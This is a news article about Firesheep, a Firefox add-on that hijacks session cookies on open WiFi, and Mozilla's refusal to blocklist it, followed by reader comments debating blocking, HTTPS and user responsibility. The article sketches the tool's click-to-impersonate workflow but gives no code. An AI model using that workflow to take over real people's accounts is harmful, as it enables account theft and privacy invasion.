Should Mozilla block Firesheep?

Should Mozilla block Firesheep?

Summary: Firesheep is a new, free Firefox add-on that makes it a snap for anyone to scan a WiFi network and hijack other people's Facebook, Twitter and other online accounts.

SHARE:

Firesheep is a new, free Firefox add-on that makes it a snap for anyone to scan a WiFi network and hijack other people's Facebook, Twitter and other online accounts.

Firesheep was developed by Seattle web app developer Eric Butler and released over the weekend at the ToorCoon security conference. Butler claims that the purpose of Firesheep is to get websites to tighten up security:

It's extremely common for websites to protect your password by encrypting the initial login, but surprisingly uncommon for websites to encrypt everything else. This leaves the cookie (and the user) vulnerable. HTTP session hijacking (sometimes called "sidejacking") is when an attacker gets a hold of a user's cookie, allowing them to do anything the user can do on a particular website. On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy.

This is a widely known problem that has been talked about to death, yet very popular websites continue to fail at protecting their users. The only effective fix for this problem is full end-to-end encryption, known on the web as HTTPS or SSL. Facebook is constantly rolling out new "privacy" features in an endless attempt to quell the screams of unhappy users, but what's the point when someone can just take over an account entirely? Twitter forced all third party developers to use OAuth then immediately released (and promoted) a new version of their insecure website. When it comes to user privacy, SSL is the elephant in the room.

The add-on is incredibly easy to use. Download the add-on. Log in to an open WiFi network and click a single button. The add-on starts capturing login data, displaying user names and photos in the sidebar. To log into the site as a particular user, just double-click on their name and you're in as them.

It's very, very easy. And very, very scary.

Firesheep can capture login data for many big sites such as Facebook, Twitter, Flickr, bit.ly, Google and Amazon.

Firesheep is free and open source and works on Mac OS X and Windows (Linus support is on the way).

Now, Firesheep is an add-on for the Firefox browser, and Mozilla have a blocklist mechanism that can be used to cripple an add-on. But in this case Mozilla's director of Firefox, Mike Beltzner, has said that Mozilla will not activate the kill-switch in this case because Firesheep doesn't exploit a vulnerability in the browser itself.

[poll id="567"]

Topics: Browser, Mobility, Security, Software Development, Wi-Fi

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

51 comments
Log in or register to join the discussion
  • Then block these as well ...

    SQL Inject Me and XSS Me addon should be blocked as well.
    cappella
  • Surprised at results of poll

    So far 61% saying no.

    I voted the other way because the point has been made, security needs to be improved, so shut it down. Too many people use the same passwords for all their accounts - banks included and they are at real risk.

    This kind of publicity of vulnerability helps build awareness but people are slow to change. I'm working with a company that has a Firefox plug-in that protects people with SSL encryption and a bunch of other security features. Even though it's free right now, I have many friends unwilling to even try it, because they don't want to deal with change. If you want to be a beta tester try it here www.getCocoon.com and let us know what you think. Thanks! DavidKris
    Davidkris2
    • RE: Should Mozilla block Firesheep?

      @Davidkris2 any chrome extension in the future? looks interesting.... but I like chrome... but would try this out, since I still use firefox from time to time
      zaghy2zy
    • RE: Should Mozilla block Firesheep?

      @Davidkris2
      Are you really that naive to think the normal user has any idea about this exploit? If they did they would have secured there wireless network. The ONLY people who know about this is criminals,blackhat hackers and the people who keep up on technology.
      As as far as your plugin. Why should anyone trust you and your software,we cant eve trust companys like adobe,apple,MS and the list goes on.
      Stan57
      • RE: Should Mozilla block Firesheep?

        @Stan57

        The normal user needs to get more damned tech savvy, to be blunt. If my FATHER who is nearly 61 years old now could tell me "Please secure my wireless network!" when we got it.... ANYONE can.
        Lerianis10
      • RE: Should Mozilla block Firesheep?

        @Lerianis10
        Welcome to the real world.
        use_what_works_4_U
    • I agree

      @Davidkris2 Yes, Firefox is directly helping keep a plugin active that obvious is used to harvest personal information from other Firefox users. You would think people would be concerned? Obviously from the Poll people are more concerned about open browsing. Well, good luck with that.
      jscott418-22447200638980614791982928182376
    • RE: Should Mozilla block Firesheep?

      @Davidkris2

      i don't recall any of the articles saying it could hijack the actual password, just the already authenticated cookie that is used as a session token...
      erik.soderquist
      • RE: Should Mozilla block Firesheep?

        @erik.soderquist by getting the cookie they can then change your password. OR they can change the email to theirs then do a forgot my password"
        Now does making the site only use https block this?
        sysop-dr
      • RE: Should Mozilla block Firesheep?

        @sysop-dr<br><br>I've yet to see any site that doesn't require entry of the old password to change the password. however; I've always advocated encrypting any and all authenticated communications.<br><br>yes, using https exclusively for all authenticated requests/responses would block those as the cookie needed for this exploit would be in the encrypted channel and therefore require breaking the encryption to get it<br><br><br>(note: i am not on facebook/twitter/etc, so i can't say either way if they require the old password on the change password form)<br><br><br> -- edit to correct spelling and complete thoughts
        erik.soderquist
      • RE: Should Mozilla block Firesheep?

        @erik.soderquist

        <b>I've yet to see any site that doesn't require entry of the old password to change the password.</b>

        Even when, like, sysop-dr said, you click on forgot my password? That's a pretty terrible system; to have to put in the password that you can't find in order to change your password.

        Mobius loop anyone?
        PlayFair
      • RE: Should Mozilla block Firesheep?

        @PlayFair

        the sites i am on (banking, credit card, etc) all require the current password to change the contact email, security questions, etc, or a call to customer care to prove you are you over the phone

        as i said earlier, i can't speak to facebook/twitter/etc as i am not on them. if their security structure is weaker, that is another black mark against them
        erik.soderquist
    • Anyone who releases something like this into the wild

      and tells you he is doing it for the "common good," is a lying snake. The guy's a slime. Period. Find him and prosecute him.
      frgough
      • Why?

        @frgough
        Why prosecute him? He's not the one that broadcast the data on an unsecured network (which in many states is now illegal to have an unsecured open wireless network).

        On top of that, he's made the point, but the thing you apparently fail to realize is that companies NEVER change unless there's money actively being lost. So, until they start losing money, they won't fix the problem and his point will just fade into the background, being largely ignored.

        It's sad he has to do this to make a point, but businesses are greedy/lazy that way.
        Zorched
      • RE: Should Mozilla block Firesheep?

        @Zorched

        well said

        and he, among many others, have been saying that https needed to be used for this specific reason for years, and almost no one listened until this tool was released. Google was among the few that did change to https as default and then posted the CPU/memory usage data to prove it was not nearly the hit that 'conventional wisdom' makes it out to be
        erik.soderquist
  • Doesn't someone need to be actually

    logging on to a site from the WiFi connection at the time Firesheep is listening? It seems improbable that firesheep can peak into someone's cookies if the cookies are not being used at the time.

    Anyone logging onto any password protected web site while using a public WiFi hot spot is an idiot and deserves to be burned...
    jacarter3
    • typical geek

      @jacarter3 your comment is the one of a typical geek who believes that everyone should know about technology.

      By saying what you've said, you've probably just burned your grandparents, your mother, and most of your potential partners.

      Leave that proud geek outside your skin and think as a human being, where each person has his own interests and they might not care about the same things as you.
      patibulo
      • RE: Should Mozilla block Firesheep?

        @patibulo

        He is thinking as a human being, just not a BRAINDEAD human being like you would wish him to think like.
        Lerianis10
    • RE: Should Mozilla block Firesheep?

      @jacarter3 How many of you dopes screaming about getting more tech savvy can actually perform all the mechanical work on your car? This is like saying that since you're going to press a gas pedal then you should be able to fix fuel injection. Yeah, right.
      ejhonda
      • RE: Should Mozilla block Firesheep?

        @ejhonda
        What jacarter3 said was very basic knowledge anyone who goes online should know so I am not sure why anyone would call that geek knowledge. Me I understand what he is saying as thats just very basic public knowledge. i also repair electronics, design web site, rebuild engines and am a certified auto collison repair tech. I also was a carpenter for 15 years before the trades died so not sure what point your trying to make??
        Fletchguy